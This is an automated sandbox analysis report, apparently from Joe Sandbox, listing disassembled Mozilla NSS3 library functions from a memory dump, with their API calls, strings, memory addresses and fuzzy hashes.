Part of subcall function 6C8809D0: _PR_MD_UNLOCK.NSS3(?), ref: 6C880D90
Part of subcall function 6C8809D0: free.MOZGLUE(00000000), ref: 6C880D99

PR_LogPrint.NSS3( ulPinLen = %d,?), ref: 6C7A2D3B

Part of subcall function 6C8809D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,?), ref: 6C880BAB
Part of subcall function 6C8809D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C880BBA
Part of subcall function 6C8809D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C880D7E

PR_LogPrint.NSS3( pLabel = 0x%p,?), ref: 6C7A2D54

Part of subcall function 6C8809D0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C880BCB
Part of subcall function 6C8809D0: EnterCriticalSection.KERNEL32(?), ref: 6C880BDE
Part of subcall function 6C8809D0: OutputDebugStringA.KERNEL32(?), ref: 6C880C16

Strings

slotID = 0x%x, xrefs: 6C7A2D02
pLabel = 0x%p, xrefs: 6C7A2D4F
C_InitToken, xrefs: 6C7A2CE7
pPin = 0x%p, xrefs: 6C7A2D1D
ulPinLen = %d, xrefs: 6C7A2D36

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: DebugOutputString$Printfflush$fwrite$CriticalEnterR_snprintfSection$CurrentExplodeFlushR_vsmprintfR_vsnprintfThreadTimefputcfreememcpystrlen
String ID: pLabel = 0x%p$ pPin = 0x%p$ slotID = 0x%x$ ulPinLen = %d$C_InitToken
API String ID: 420000887-1567254798
Opcode ID: c2a4dd6b859e587025d4127a9ef4f6cab45ab94ddb15e988a4e7b8b825f83e88
Instruction ID: 608788fc972c3f0b3014c7d2a9c26859745dc8dcab09ff6540c2c9cd548a5ff8
Opcode Fuzzy Hash: c2a4dd6b859e587025d4127a9ef4f6cab45ab94ddb15e988a4e7b8b825f83e88
Instruction Fuzzy Hash: 0A21C475202144AFDB209F95DF4DA557BB1EB8631DF448570E90897A23CB30BC4ACBA1

Function 6C880EB0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 65COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(Aborting,?,6C762357), ref: 6C880EB8
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(6C762357), ref: 6C880EC0
PR_LogPrint.NSS3(Assertion failure: %s, at %s:%d,00000000,00000001,?,00000001,00000000,00000000), ref: 6C880EE6

Part of subcall function 6C8809D0: PR_Now.NSS3 ref: 6C880A22
Part of subcall function 6C8809D0: PR_ExplodeTime.NSS3(00000000,?,?,?), ref: 6C880A35
Part of subcall function 6C8809D0: PR_snprintf.NSS3(?,000001FF,%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - ,?,?,?,?,?,?,?), ref: 6C880A66
Part of subcall function 6C8809D0: PR_GetCurrentThread.NSS3 ref: 6C880A70
Part of subcall function 6C8809D0: PR_snprintf.NSS3(?,000001FF,%ld[%p]: ,00000000,00000000), ref: 6C880A9D
Part of subcall function 6C8809D0: PR_vsnprintf.NSS3(-FFFFFDF0,000001FF,?,?), ref: 6C880AC8
Part of subcall function 6C8809D0: PR_vsmprintf.NSS3(?,?), ref: 6C880AE8
Part of subcall function 6C8809D0: EnterCriticalSection.KERNEL32(?), ref: 6C880B19
Part of subcall function 6C8809D0: OutputDebugStringA.KERNEL32(00000000), ref: 6C880B48
Part of subcall function 6C8809D0: _PR_MD_UNLOCK.NSS3(?), ref: 6C880C76
Part of subcall function 6C8809D0: PR_LogFlush.NSS3 ref: 6C880C7E

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,00000001,00000000,00000000), ref: 6C880EFA

Part of subcall function 6C76AEE0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000001,?,00000000,?,00000001,?,?,?,00000001,00000000,00000000), ref: 6C76AF0E

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C880F16
fflush.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C880F1C
DebugBreak.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C880F25
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C880F2B

Strings

Assertion failure: %s, at %s:%d, xrefs: 6C880ED9, 6C880EE5, 6C880F06, 6C880F0B
Aborting, xrefs: 6C880EB3

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: DebugPrintR_snprintf__acrt_iob_funcabort$BreakCriticalCurrentEnterExplodeFlushOutputR_vsmprintfR_vsnprintfSectionStringThreadTime__stdio_common_vfprintffflush
String ID: Aborting$Assertion failure: %s, at %s:%d
API String ID: 3905088656-1374795319
Opcode ID: 4bf925064706de039615ff9404ece918175a969144902e7770f6adedba36fa10
Instruction ID: 95dbdf9d075b9440fe2e9f0ab8b3f228ff663e2d3dd732bc2caf5fecd2a6dcd8
Opcode Fuzzy Hash: 4bf925064706de039615ff9404ece918175a969144902e7770f6adedba36fa10
Instruction Fuzzy Hash: 5AF0A4B99001187BDA203BA19C4AC9B3F2DDF42369F004434FE0956B03DB36EA5596F2

Function 6C7E4DB0 Relevance: 16.9, APIs: 11, Instructions: 395memoryCOMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000400), ref: 6C7E4DCB

Part of subcall function 6C7D0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C7787ED,00000800,6C76EF74,00000000), ref: 6C7D1000
Part of subcall function 6C7D0FF0: PR_NewLock.NSS3(?,00000800,6C76EF74,00000000), ref: 6C7D1016
Part of subcall function 6C7D0FF0: PL_InitArenaPool.NSS3(00000000,security,6C7787ED,00000008,?,00000800,6C76EF74,00000000), ref: 6C7D102B

PORT_ArenaAlloc_Util.NSS3(00000000,0000001C), ref: 6C7E4DE1

Part of subcall function 6C7D10C0: TlsGetValue.KERNEL32(?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D10F3
Part of subcall function 6C7D10C0: EnterCriticalSection.KERNEL32(?,?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D110C
Part of subcall function 6C7D10C0: PL_ArenaAllocate.NSS3(?,?,?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D1141
Part of subcall function 6C7D10C0: PR_Unlock.NSS3(?,?,?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D1182
Part of subcall function 6C7D10C0: TlsGetValue.KERNEL32(?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D119C

PORT_ArenaAlloc_Util.NSS3(?,0000001C), ref: 6C7E4DFF
SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C7E4E59

Part of subcall function 6C7CFAB0: free.MOZGLUE(?,-00000001,?,?,6C76F673,00000000,00000000), ref: 6C7CFAC7

SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6C8A300C,00000000), ref: 6C7E4EB8
SECOID_FindOID_Util.NSS3(?), ref: 6C7E4EFF
memcmp.VCRUNTIME140(?,00000000,00000000), ref: 6C7E4F56
PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C7E521A

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Util$Arena$Alloc_Arena_Item_Value$AllocateCriticalDecodeEnterFindFreeInitLockPoolQuickSectionUnlockZfreecallocfreememcmp
String ID:
API String ID: 1025791883-0
Opcode ID: e19f99d60a5dbbb858220a4ca60d69d0f57c4f7f169595bc98d21a840ce35b07
Instruction ID: 34dcbb59c3230a960a31f102413f193d8210f8c29fc9f8198eb57eb082ecf93d
Opcode Fuzzy Hash: e19f99d60a5dbbb858220a4ca60d69d0f57c4f7f169595bc98d21a840ce35b07
Instruction Fuzzy Hash: F4F16E72E00209CFDB04CF94E9407ADB7B2FF49358F258169E915AB781E775E981CB90

Function 6C774FD0 Relevance: 16.6, APIs: 11, Instructions: 112COMMON

Download Yara Rule

APIs

PR_NewLock.NSS3(00000001,00000000,6C8C0148,?,6C786FEC), ref: 6C77502A
PR_NewLock.NSS3(00000001,00000000,6C8C0148,?,6C786FEC), ref: 6C775034
PL_NewHashTable.NSS3(00000000,6C7CFE80,6C7CFD30,6C81C350,00000000,00000000,00000001,00000000,6C8C0148,?,6C786FEC), ref: 6C775055
PL_NewHashTable.NSS3(00000000,6C7CFE80,6C7CFD30,6C81C350,00000000,00000000,?,00000001,00000000,6C8C0148,?,6C786FEC), ref: 6C77506D

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: HashLockTable
String ID:
API String ID: 3862423791-0
Opcode ID: e620ea8200646f53bfbce6f20205d2b12e8303b87a6c1a375c5b2e9ee64be2d9
Instruction ID: 1435252145804286d7052400a5d592b113995eadc7515e2ab872c058ca050c59
Opcode Fuzzy Hash: e620ea8200646f53bfbce6f20205d2b12e8303b87a6c1a375c5b2e9ee64be2d9
Instruction Fuzzy Hash: 64319AB1B052249BEF709B659B4CF4736B8BB1236CF158134EA0587A40E779B904CBF1

Function 6C712E50 Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 282COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(00000000,?,?), ref: 6C712F3D
memset.VCRUNTIME140(?,00000000,?), ref: 6C712FB9
memcpy.VCRUNTIME140(?,00000000,?), ref: 6C713005
memcpy.VCRUNTIME140(?,?,?), ref: 6C7130EE
memcpy.VCRUNTIME140(00000000,?,?), ref: 6C713131
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,0001086C,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C713178

Strings

9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C713022, 6C713156, 6C713162, 6C71318A, 6C713196, 6C7131A2, 6C7131AE, 6C7131BA, 6C7131C6
database corruption, xrefs: 6C71316C
%s at line %d of [%.10s], xrefs: 6C713171

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: memcpy$memsetsqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 984749767-598938438
Opcode ID: 02fadaab0bf685c2a62b37efe6a2e500dbbd20990471ba8001ff7b9a6b8cf04a
Instruction ID: 6fde377befe9a8a92e561df84e8383fcb81db84f4233f9b0377bb6b9b7dd416e
Opcode Fuzzy Hash: 02fadaab0bf685c2a62b37efe6a2e500dbbd20990471ba8001ff7b9a6b8cf04a
Instruction Fuzzy Hash: 9EB1B4B0E092199FCB18CF9DCA84AEEB7B2BF49314F184429E545B7B41D374A941DBA0

Function 6C7E7F90 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 167COMMON

Download Yara Rule

APIs

PR_GetMonitorEntryCount.NSS3(?,?,00000002,00000050,?,?,?,?,?,00000000), ref: 6C7E7FB2

Part of subcall function 6C76BA40: TlsGetValue.KERNEL32 ref: 6C76BA51
Part of subcall function 6C76BA40: TlsGetValue.KERNEL32 ref: 6C76BA6B
Part of subcall function 6C76BA40: EnterCriticalSection.KERNEL32 ref: 6C76BA83
Part of subcall function 6C76BA40: TlsGetValue.KERNEL32 ref: 6C76BAA1
Part of subcall function 6C76BA40: _PR_MD_UNLOCK.NSS3 ref: 6C76BAC0

PR_EnterMonitor.NSS3(?,?,?,00000002,00000050,?,?,?,?,?,00000000), ref: 6C7E7FD4

Part of subcall function 6C839090: TlsGetValue.KERNEL32 ref: 6C8390AB
Part of subcall function 6C839090: TlsGetValue.KERNEL32 ref: 6C8390C9
Part of subcall function 6C839090: EnterCriticalSection.KERNEL32 ref: 6C8390E5
Part of subcall function 6C839090: TlsGetValue.KERNEL32 ref: 6C839116
Part of subcall function 6C839090: LeaveCriticalSection.KERNEL32 ref: 6C83913F

Part of subcall function 6C7E9430: PR_SetError.NSS3(FFFFD0AC,00000000), ref: 6C7E9466

PR_ExitMonitor.NSS3(?), ref: 6C7E801B
PR_EnterMonitor.NSS3(?), ref: 6C7E8034
TlsGetValue.KERNEL32 ref: 6C7E80A2
PR_SetError.NSS3(FFFFE001,00000000), ref: 6C7E80C0
PR_ExitMonitor.NSS3(?), ref: 6C7E811C
PR_ExitMonitor.NSS3(?), ref: 6C7E8134

Strings

), xrefs: 6C7E80DB

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Value$Monitor$Enter$CriticalExitSection$Error$CountEntryLeave
String ID: )
API String ID: 3537756449-2427484129
Opcode ID: 21708ce3db6ec98d25bd51058a0d5bc782e0006cd3f4aa6a4ac97d8e46967ef7
Instruction ID: 7935a2117e5007c98519a6bea690e9f47173290561476c0275eead1847fc8e2b
Opcode Fuzzy Hash: 21708ce3db6ec98d25bd51058a0d5bc782e0006cd3f4aa6a4ac97d8e46967ef7
Instruction Fuzzy Hash: 56513772A047049BE7219F3CDE057EB77B0AF5A34CF08093DDD5956A42EB31AA09C792

Function 6C78FCA0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 99stringmemoryCOMMON

Download Yara Rule

APIs

PK11_IsInternalKeySlot.NSS3(?,?,00000000,?), ref: 6C78FCBD
strchr.VCRUNTIME140(?,0000003A,?,?,00000000,?), ref: 6C78FCCC
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,00000000,?), ref: 6C78FCEF
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C78FD32
PORT_ArenaAlloc_Util.NSS3(00000000,00000001), ref: 6C78FD46
PORT_Alloc_Util.NSS3(00000001), ref: 6C78FD51
memcpy.VCRUNTIME140(00000000,00000000,-00000001), ref: 6C78FD6D
memcpy.VCRUNTIME140(00000000,?,?), ref: 6C78FD84

Strings

:, xrefs: 6C78FD78

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Alloc_Utilmemcpystrlen$ArenaInternalK11_Slotstrchr
String ID: :
API String ID: 183580322-336475711
Opcode ID: 6b01cbbeec5e53cf722db012dedf94c099d5da7b2fd0114ccdec8c6525f24190
Instruction ID: 8ac196f53724da25d340976bf3755a27b40f1a6e1518369e99448651465cf029
Opcode Fuzzy Hash: 6b01cbbeec5e53cf722db012dedf94c099d5da7b2fd0114ccdec8c6525f24190
Instruction Fuzzy Hash: 9C31F6B6D022055BEB108BA4DE167AF77A8EF45318F150434DF14A7B00E771EA08C7E2

Function 6C7A6C40 Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 87COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_DigestInit), ref: 6C7A6C66
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C7A6C94
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C7A6CA3

Part of subcall function 6C88D930: PL_strncpyz.NSS3(?,?,?), ref: 6C88D963

PR_LogPrint.NSS3(?,00000000), ref: 6C7A6CB9
PR_LogPrint.NSS3( pMechanism = 0x%p,?), ref: 6C7A6CD5

Strings

pMechanism = 0x%p, xrefs: 6C7A6CD0
hSession = 0x%x, xrefs: 6C7A6C7E, 6C7A6C8E
C_DigestInit, xrefs: 6C7A6C61
(CK_INVALID_HANDLE), xrefs: 6C7A6C9C

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: hSession = 0x%x$ pMechanism = 0x%p$ (CK_INVALID_HANDLE)$C_DigestInit
API String ID: 1003633598-3690128261
Opcode ID: b13b5b458fae85f5e85c830957ba1f6d736cd8630f46a9a8903c989b927b1960
Instruction ID: cea1f0e0e8c0deab1e154d8d3909dee32d204ea93811d88b772e29b4c9ab9e2d
Opcode Fuzzy Hash: b13b5b458fae85f5e85c830957ba1f6d736cd8630f46a9a8903c989b927b1960
Instruction Fuzzy Hash: 4821E331602114ABDB209BA89F8DB9A77B5EB4631DF448535E80997B02DB34BE09C7D2

Function 6C7A9DD0 Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 85COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_SessionCancel), ref: 6C7A9DF6
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C7A9E24
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C7A9E33

Part of subcall function 6C88D930: PL_strncpyz.NSS3(?,?,?), ref: 6C88D963

PR_LogPrint.NSS3(?,00000000), ref: 6C7A9E49
PR_LogPrint.NSS3( flags = 0x%x,?), ref: 6C7A9E65

Strings

hSession = 0x%x, xrefs: 6C7A9E0E, 6C7A9E1E
flags = 0x%x, xrefs: 6C7A9E60
C_SessionCancel, xrefs: 6C7A9DF1
(CK_INVALID_HANDLE), xrefs: 6C7A9E2C

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: flags = 0x%x$ hSession = 0x%x$ (CK_INVALID_HANDLE)$C_SessionCancel
API String ID: 1003633598-1678415578
Opcode ID: 66a4055b29a3a87c7762d1f27ef97010be4c3245837695d18bf265ef41922e20
Instruction ID: fcf746f972118175b67ce925026ca11e1e1bda14c77b81cae7b998032579ba79
Opcode Fuzzy Hash: 66a4055b29a3a87c7762d1f27ef97010be4c3245837695d18bf265ef41922e20
Instruction Fuzzy Hash: 1021E672602104AFDB209B989F8DBAA77B8EB4631DF044535E80997B02DB35BC59C7D2

Function 6C770F30 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 85memoryCOMMON

Download Yara Rule

APIs

PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6C770F62
SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6C770F84

Part of subcall function 6C7CB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C8A18D0,?), ref: 6C7CB095

SEC_QuickDERDecodeItem_Util.NSS3(?,6C78F59B,6C89890C,?), ref: 6C770FA8
PORT_Alloc_Util.NSS3(4C8B1474), ref: 6C770FC1

Part of subcall function 6C7D0BE0: malloc.MOZGLUE(6C7C8D2D,?,00000000,?), ref: 6C7D0BF8
Part of subcall function 6C7D0BE0: TlsGetValue.KERNEL32(6C7C8D2D,?,00000000,?), ref: 6C7D0C15

memcpy.VCRUNTIME140(00000000,?,4C8B1474), ref: 6C770FDB
PR_CallOnce.NSS3(6C8D2AA4,6C7D12D0), ref: 6C770FEF
PL_FreeArenaPool.NSS3(?), ref: 6C771001
PL_FinishArenaPool.NSS3(?), ref: 6C771009

Strings

security, xrefs: 6C770F5C

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: ArenaPoolUtil$DecodeItem_Quick$Alloc_CallErrorFinishFreeInitOnceValuemallocmemcpy
String ID: security
API String ID: 2061345354-3315324353
Opcode ID: ba143f651d26496e45517994c0fc80867c658541e2a7c52f8c4bebb9ddb2acd4
Instruction ID: 653c0276bede34dc106a822bf4594aea11cbc948d1b0fa73d99b0ca8fb56cb94
Opcode Fuzzy Hash: ba143f651d26496e45517994c0fc80867c658541e2a7c52f8c4bebb9ddb2acd4
Instruction Fuzzy Hash: 89212B71904304ABDB209F24DE45AAB77B4EF4525CF048928FC1897701F731E645C7E2

Function 6C776DB0 Relevance: 15.2, APIs: 10, Instructions: 200memoryCOMMON

Download Yara Rule

APIs

SECITEM_ArenaDupItem_Util.NSS3(?,6C777D8F,6C777D8F,?,?), ref: 6C776DC8

Part of subcall function 6C7CFDF0: PORT_ArenaAlloc_Util.NSS3(?,0000000C,00000000,?,?), ref: 6C7CFE08
Part of subcall function 6C7CFDF0: PORT_ArenaAlloc_Util.NSS3(?,?,?,?,?,?), ref: 6C7CFE1D
Part of subcall function 6C7CFDF0: memcpy.VCRUNTIME140(00000000,?,?,?,?,?,?), ref: 6C7CFE62

PORT_ArenaAlloc_Util.NSS3(?,00000010,?,?,6C777D8F,?,?), ref: 6C776DD5

Part of subcall function 6C7D10C0: TlsGetValue.KERNEL32(?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D10F3
Part of subcall function 6C7D10C0: EnterCriticalSection.KERNEL32(?,?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D110C
Part of subcall function 6C7D10C0: PL_ArenaAllocate.NSS3(?,?,?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D1141
Part of subcall function 6C7D10C0: PR_Unlock.NSS3(?,?,?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D1182
Part of subcall function 6C7D10C0: TlsGetValue.KERNEL32(?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D119C

SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6C898FA0,00000000,?,?,?,?,6C777D8F,?,?), ref: 6C776DF7

Part of subcall function 6C7CB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C8A18D0,?), ref: 6C7CB095

SECITEM_ArenaDupItem_Util.NSS3(?,00000000), ref: 6C776E35

Part of subcall function 6C7CFDF0: PORT_Alloc_Util.NSS3(0000000C,00000000,?,?), ref: 6C7CFE29
Part of subcall function 6C7CFDF0: PORT_Alloc_Util.NSS3(?,?,?,?), ref: 6C7CFE3D
Part of subcall function 6C7CFDF0: free.MOZGLUE(00000000,?,?,?,?), ref: 6C7CFE6F

PORT_ArenaAlloc_Util.NSS3(?,0000005C), ref: 6C776E4C

